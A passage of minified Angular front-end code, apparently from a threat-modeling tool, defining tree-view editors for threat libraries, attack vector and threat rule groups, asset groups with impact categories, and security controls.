10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function Tft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(V(2).selectedAttackVectorGroup.Description=n)}),u(),s(9,"\n "),u(),s(10,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,3,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAttackVectorGroup.Description)}}function Eft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n "),m(2,"h2"),s(3),u(),s(4,"\n "),ne(5,Tft,11,5,"ng-container",2),s(6,"\n "),it(7,"app-attack-vector",3),s(8,"\n"),u()),2&t){const e=V();g(3),ke(e.selectedNode.name()),g(2),F("ngIf",e.selectedAttackVectorGroup),g(2),F("attackVector",e.selectedAttackVector)}}let Dft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedAttackVectorGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof tM?this.selectedNode.data:null}get selectedAttackVector(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof zp?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteAttackVector(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let te=this.dataService.Config.CreateAttackVector(T);te.CopyFrom(d.Data),te.Name=te.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(te),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.attackVectorIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.attackVectorIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=k),onMoveToGroup:te=>{let pe="attackVectorIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return Y},n=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.AttackVector")],onAdd:te=>{let pe=null;pe=te==this.translate.instant("general.Group")?this.dataService.Config.CreateAttackVectorGroup(d):this.dataService.Config.CreateAttackVector(d),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(pe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteAttackVectorGroup(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.attackVectorGroupIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.attackVectorGroupIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=Y&&te!=k),onMoveToGroup:te=>{let pe="attackVectorGroupIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return d.SubGroups.forEach(te=>{let pe=n(te,d,Y,q);Y.children.push(pe)}),d.AttackVectors.forEach(te=>Y.children.push(i(te,d,Y,q))),q.push(Y),Y},c=n(this.dataService.Config.ThreatLibrary,null,null,[]);c.icon="library_books",c.canSelect=!1,c.canDelete=!1,c.addOptions=null,c.canRename=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-library"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"attackVector"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"]],template:function(e,i){1&e&&ne(0,Eft,9,3,"div",0),2&e&&F("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,nn,un,Go,Xa,jg,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})();function xft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(V(2).selectedThreatRuleGroup.Description=n)}),u(),s(9,"\n "),u(),s(10,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,3,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedThreatRuleGroup.Description)}}function wft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",6),he("change",function(n){return be(e),Me(V(2).OnRulesActiveChange(n.checked))}),s(3),oe(4,"translate"),u(),s(5,"\n "),Mt()}if(2&t){const e=V(2);g(2),F("checked",e.allGroupRulesActive)("indeterminate",e.someGroupRulesActive),g(1),ke(re(4,3,"properties.IsActive"))}}function Ift(t,a){if(1&t&&it(0,"app-threat-rule",7),2&t){const e=V(2);F("node",e.selectedNode)("threatRule",e.selectedThreatRule)}}function Rft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n "),m(2,"h2"),s(3),u(),s(4,"\n "),ne(5,xft,11,5,"ng-container",2),s(6,"\n "),s(7,"\n "),ne(8,wft,6,5,"ng-container",2),s(9,"\n "),ne(10,Ift,1,2,"app-threat-rule",3),s(11,"\n"),u()),2&t){const e=V();g(3),ke(e.selectedNode.name()),g(2),F("ngIf",e.selectedThreatRuleGroup),g(3),F("ngIf",e.selectedThreatRuleGroup),g(2),F("ngIf",e.selectedThreatRule)}}let Sft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedThreatRuleGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof aM?this.selectedNode.data:null}get selectedThreatRule(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Fp?this.selectedNode.data:null}get allGroupRulesActive(){return!!this.selectedThreatRuleGroup&&this.selectedThreatRuleGroup.ThreatRules.every(e=>e.IsActive)}get someGroupRulesActive(){return!(!this.selectedThreatRuleGroup||this.allGroupRulesActive)&&this.selectedThreatRuleGroup.ThreatRules.length>0&&this.selectedThreatRuleGroup.ThreatRules.some(e=>e.IsActive)}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OnRulesActiveChange(e){this.selectedThreatRuleGroup&&this.selectedThreatRuleGroup.ThreatRules.forEach(i=>i.IsActive=e)}createNodes(){const e=this.Nodes;if(this.Nodes=[],!this.dataService.Config)return;let i=(k,q,Y,te)=>{let pe={name:()=>k.Name,canSelect:!0,data:k,canRename:!0,onRename:Re=>{k.Name=Re},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(Re=>{Re&&(this.dataService.Config.DeleteThreatRule(k),this.selectedNode==pe&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateThreatRule(q,on.DFD);Re.CopyFrom(k.Data),Re.Name=Re.Name+"-Copy",this.dataService.Config.GetThreatRuleGroups().find(Fe=>Fe.ThreatRules.includes(k)).AddThreatRule(Re),this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=q.Data.threatRuleIDs;if(0!=Re.findIndex(Fe=>Fe==k.ID)){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=q.Data.threatRuleIDs;if(Re.findIndex(Fe=>Fe==k.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>te.filter(Re=>Re!=Y),onMoveToGroup:Re=>{let Fe="threatRuleIDs";q.Data[Fe].splice(q.Data[Fe].indexOf(k.ID),1),Re.data.Data[Fe].push(k.ID),this.createNodes()}};return pe},n=(k,q,Y,te)=>{let pe={name:()=>k.Name,canSelect:!0,data:k,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.ThreatRule")],onAdd:Re=>{let Fe=null;Fe=Re==this.translate.instant("general.Group")?this.dataService.Config.CreateThreatRuleGroup(k):this.dataService.Config.CreateThreatRule(k,on.DFD),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(Fe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:Re=>{k.Name=Re},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(Re=>{Re&&(this.dataService.Config.DeleteThreatRuleGroup(k),this.selectedNode==pe&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let Re=q.Data.threatRuleGroupIDs;if(0!=Re.findIndex(Fe=>Fe==k.ID)){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=q.Data.threatRuleGroupIDs;if(Re.findIndex(Fe=>Fe==k.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>te.filter(Re=>Re!=pe&&Re!=Y),onMoveToGroup:Re=>{let Fe="threatRuleGroupIDs";q.Data[Fe].splice(q.Data[Fe].indexOf(k.ID),1),Re.data.Data[Fe].push(k.ID),this.createNodes()}};return k.SubGroups.forEach(Re=>{let Fe=n(Re,k,pe,te);pe.children.push(Fe)}),k.ThreatRules.forEach(Re=>pe.children.push(i(Re,k,pe,te))),te.push(pe),pe},r=[],c=n(this.dataService.Config.DFDThreatRuleGroups,null,null,r);c.icon="compare_arrows",c.canSelect=!1,c.canDelete=!1;let d=n(this.dataService.Config.StencilThreatRuleGroups,null,null,r);d.icon="view_module",d.canSelect=!1,d.canDelete=!1,d.canAdd=!1;let T=n(this.dataService.Config.ComponentThreatRuleGroups,null,null,r);T.icon="code",T.canSelect=!1,T.canDelete=!1,T.canAdd=!1,this.Nodes.push(c),this.Nodes.push(d),this.Nodes.push(T),this.Nodes.forEach(k=>k.hasMenu=!0),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-rules"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"node","threatRule",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"checked","indeterminate","change"],[3,"node","threatRule"]],template:function(e,i){1&e&&ne(0,Rft,12,4,"div",0),2&e&&F("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,br,nn,un,Go,Xa,qp,Xi]}),t})();function kft(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(V(3).selectedAssetGroup.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Pft(t,a){1&t&&(m(0,"mat-hint",23),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct("\n ",re(2,1,"messages.error.numberAlreadyExists"),"\n "))}function Oft(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",20),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"input",21),he("ngModelChange",function(n){return be(e),Me(V(3).selectedAssetGroup.Number=n)}),u(),s(7,"\n "),ne(8,Pft,3,3,"mat-hint",22),s(9,"\n "),u()}if(2&t){const e=V(3);g(3),ke(re(4,4,"general.Number")),g(3),at("matTooltip",e.selectedAssetGroup.Number),F("ngModel",e.selectedAssetGroup.Number),g(2),F("ngIf",e.selectedAssetGroup.CheckUniqueNumber())}}function Nft(t,a){if(1&t){const e=Ye();m(0,"table",24),s(1,"\n "),m(2,"tr")(3,"td")(4,"mat-checkbox",25),he("change",function(){const r=be(e).$implicit,c=V(3);return Me(c.ImpactCatChanged(c.selectedAssetGroup,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);g(4),F("checked",i.selectedAssetGroup.ImpactCats.includes(e)),g(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}function Lft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",10),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",11),he("ngModelChange",function(n){return be(e),Me(V(2).selectedAssetGroup.Name=n)}),u(),s(9,"\n "),ne(10,kft,6,3,"button",12),s(11,"\n "),u(),s(12,"\n "),ne(13,Oft,10,6,"mat-form-field",13),s(14,"\n "),it(15,"br"),s(16,"\n "),m(17,"mat-form-field",14),s(18,"\n "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n "),m(23,"textarea",15),he("ngModelChange",function(n){return be(e),Me(V(2).selectedAssetGroup.Description=n)}),u(),s(24,"\n "),u(),s(25,"\n "),m(26,"mat-checkbox",16),he("ngModelChange",function(n){return be(e),Me(V(2).selectedAssetGroup.IsActive=n)}),s(27),oe(28,"translate"),u(),s(29,"\n "),m(30,"h3"),s(31),oe(32,"translate"),u(),s(33,"\n "),m(34,"div",17),s(35,"\n "),ne(36,Nft,8,4,"table",18),s(37,"\n "),u(),s(38,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,13,"general.Name")),g(3),at("matTooltip",e.selectedAssetGroup.Name),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAssetGroup.Name),g(2),F("ngIf",e.selectedAssetGroup.Name),g(3),F("ngIf",e.selectedAssetGroup.IsNewAsset),g(7),ke(re(21,15,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAssetGroup.Description),g(3),F("ngModel",e.selectedAssetGroup.IsActive),g(1),ke(re(28,17,"properties.IsActive")),g(4),ke(re(32,19,"properties.ImpactCategories")),g(5),F("ngForOf",e.GetImpactCategories())}}function zft(t,a){if(1&t){const e=Ye();m(0,"button",34),he("click",function(){const r=be(e).$implicit,c=V().item;return Me(V(3).OnMoveToGroup(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;g(1),ke(e.Name)}}function Wft(t,a){if(1&t&&(s(0,"\n "),ne(1,zft,2,1,"button",33),s(2,"\n ")),2&t){const e=a.groups;g(1),F("ngForOf",e)}}const Fft=function(t,a){return{groups:t,item:a}};function Vft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",26),he("click",function(){const r=be(e).$implicit;return Me(V(2).selectedMyData=r)}),s(1,"\n "),m(2,"mat-icon",27),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",28),s(6),u(),s(7,"\n "),m(8,"div",28),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n "),m(13,"button",29),oe(14,"translate"),m(15,"mat-icon"),s(16,"low_priority"),u()(),s(17,"\n "),m(18,"button",30),he("click",function(){const r=be(e).$implicit;return Me(V(2).DeleteMyData(r))}),oe(19,"translate"),m(20,"mat-icon"),s(21,"delete"),u()(),s(22,"\n "),m(23,"mat-menu",null,31),s(25,"\n "),ne(26,Wft,3,1,"ng-template",32),s(27," \n "),u(),s(28,"\n "),u()}if(2&t){const e=a.$implicit,i=Ti(24),n=V(2);Ct("highlight-light",n.selectedMyData===e&&!n.theme.IsDarkMode)("highlight-dark",n.selectedMyData===e&&n.theme.IsDarkMode),at("matTooltip",null==e?null:e.Name),g(6),ke(e.Name),g(3),za("",re(10,12,"properties.Sensitivity"),": ",re(11,14,n.GetSensitivity(e.Sensitivity)),""),g(4),at("matTooltip",re(14,16,"nav-tree.moveToGroup")),F("matMenuTriggerFor",i)("matMenuTriggerData",Ah(20,Fft,n.GetMoveToGroups(e),e)),g(5),at("matTooltip",re(19,18,"general.Delete"))}}function Bft(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"div",35),s(3,"\n "),it(4,"app-mydata",36),s(5,"\n "),u(),s(6,"\n "),Mt()),2&t){const e=V(2);g(4),F("myData",e.selectedMyData)}}function Hft(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n "),ne(2,Lft,39,21,"ng-container",2),s(3,"\n "),m(4,"div",3),s(5,"\n "),m(6,"div",4),s(7,"\n "),m(8,"mat-list",5),he("cdkDropListDropped",function(n){be(e);const r=V();return Me(r.dropWrapper(n,r.selectedAssetGroup.AssociatedData))}),s(9,"\n "),m(10,"div",6),s(11),oe(12,"translate"),m(13,"button",7),he("click",function(){return be(e),Me(V().AddMyData())}),oe(14,"translate"),m(15,"mat-icon"),s(16,"add"),u()()(),s(17,"\n "),ne(18,Vft,29,23,"mat-list-item",8),s(19,"\n "),u(),s(20,"\n "),u(),s(21,"\n "),m(22,"div",9),s(23,"\n "),ne(24,Bft,7,1,"ng-container",2),s(25,"\n "),u(),s(26,"\n "),u(),s(27,"\n"),u()}if(2&t){const e=V();g(2),F("ngIf",e.selectedAssetGroup),g(6),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),ct("",re(12,9,"general.Datas")," "),g(2),at("matTooltip",re(14,11,"general.Add")),g(5),F("ngForOf",e.selectedAssetGroup.AssociatedData),g(6),F("ngIf",null==e.selectedAssetGroup.AssociatedData?null:e.selectedAssetGroup.AssociatedData.includes(e.selectedMyData))}}let EZ=(()=>{class t extends xa{constructor(e,i,n){super(),this.theme=e,this.dataService=i,this.dialog=n,this.selectedMyData=null,i.ConfigChanged.subscribe(r=>this.createNodes())}get selectedAssetGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Zl?this.selectedNode.data:null}ngOnInit(){null==this.isProject&&console.error("isProject is unset"),setTimeout(()=>{this.createNodes()},100)}AddMyData(){let e;e=this.isProject?this.dataService.Project.CreateMyData(this.selectedAssetGroup):this.dataService.Config.CreateMyData(this.selectedAssetGroup),this.selectedMyData=e}DeleteMyData(e){this.isProject?this.dataService.Project.DeleteMyData(e):this.dataService.Config.DeleteMyData(e),this.selectedMyData==e&&(this.selectedMyData=null)}GetMoveToGroups(e){return this.assetGroup.GetGroupsFlat().filter(i=>!i.AssociatedData.includes(e))}OnMoveToGroup(e,i){this.assetGroup.GetGroupsFlat().find(r=>r.AssociatedData.includes(e)).RemoveMyData(e),i.AddMyData(e)}dropWrapper(e,i){let n=i.map(c=>c.ID);Qs(n,e.previousIndex,e.currentIndex);let r=[];n.forEach(c=>r.push(i.find(d=>d.ID==c))),this.selectedAssetGroup.AssociatedData=r}GetSensitivity(e){return An.ToString(e)}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=null;i=this.isProject?this.dataService.Project:this.dataService.Config;let n=(r,c,d,T)=>{let k={name:()=>r.Name,canSelect:!0,canAdd:!0,isInactive:()=>!r.IsActive,data:r,onAdd:()=>{let q=i.CreateAssetGroup(r);this.createNodes(),this.selectedNode=this.FindNodeOfObject(q),this.selectedNode.isRenaming=!0},canRename:!0,onRename:q=>{r.Name=q},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(q=>{q&&(i.DeleteAssetGroup(r),this.selectedNode==k&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let q=c.Data.assetGroupIDs;if(0!=q.findIndex(Y=>Y==r.ID)){let Y=q.findIndex(te=>te==r.ID);q.splice(Y,0,q.splice(Y-1,1)[0]),d.children.splice(Y,0,d.children.splice(Y-1,1)[0])}},onMoveDown:()=>{let q=c.Data.assetGroupIDs;if(q.findIndex(Y=>Y==r.ID)!=q.length-1){let Y=q.findIndex(te=>te==r.ID);q.splice(Y,0,q.splice(Y+1,1)[0]),d.children.splice(Y,0,d.children.splice(Y+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>T.filter(q=>q!=k&&q!=d),onMoveToGroup:q=>{let Y="assetGroupIDs";c.Data[Y].splice(c.Data[Y].indexOf(r.ID),1),q.data.Data[Y].push(r.ID),this.createNodes()}};return this.isProject&&r.IsNewAsset&&(k.icon="add_circle_outline",k.iconAlignLeft=!0),null==k.isExpanded&&!r.IsActive&&(k.isExpanded=!1),r.SubGroups.forEach(q=>{let Y=n(q,r,k,T);k.children.push(Y)}),T.push(k),k};if(this.assetGroup){let c=n(this.assetGroup,null,null,[]);c.icon=Zl.Icon,c.iconAlignLeft=!1,c.canDelete=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-assets"]],inputs:{assetGroup:"assetGroup",isProject:"isProject"},features:[ci],decls:1,vars:1,consts:[["style","margin: 10px;",4,"ngIf"],[2,"margin","10px"],[4,"ngIf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill","style","width: 70px; float: right; margin-left: 10px;",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],[1,"alert","alert-danger",2,"color","red"],[2,"min-width","200px"],["color","primary",3,"checked","change"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["moveMenu","matMenu"],["matMenuContent",""],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["mat-menu-item","",3,"click"],[2,"margin-left","10px"],[3,"myData"]],template:function(e,i){1&e&&ne(0,Hft,28,13,"div",0),2&e&&F("ngIf",i.selectedNode)},dependencies:[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,Sd,kd,oa,br,da,nn,fp,un,jr,Go,Xa,ts,is,Or,Lr,rc,Xo,qo,po,el,Pa,v5,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function Uft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(V(2).selectedControlGroup.Description=n)}),u(),s(9,"\n "),u(),s(10,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,3,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedControlGroup.Description)}}function qft(t,a){if(1&t&&it(0,"app-control",6),2&t){const e=V(2);F("node",e.selectedNode)("control",e.selectedControl)}}function Gft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n "),m(2,"h2"),s(3),u(),s(4,"\n "),ne(5,Uft,11,5,"ng-container",2),s(6,"\n "),ne(7,qft,1,2,"app-control",3),s(8,"\n"),u()),2&t){const e=V();g(3),ke(e.selectedNode.name()),g(2),F("ngIf",e.selectedControlGroup),g(2),F("ngIf",e.selectedControl)}}let jft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedControlGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Yb?this.selectedNode.data:null}get selectedControl(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof 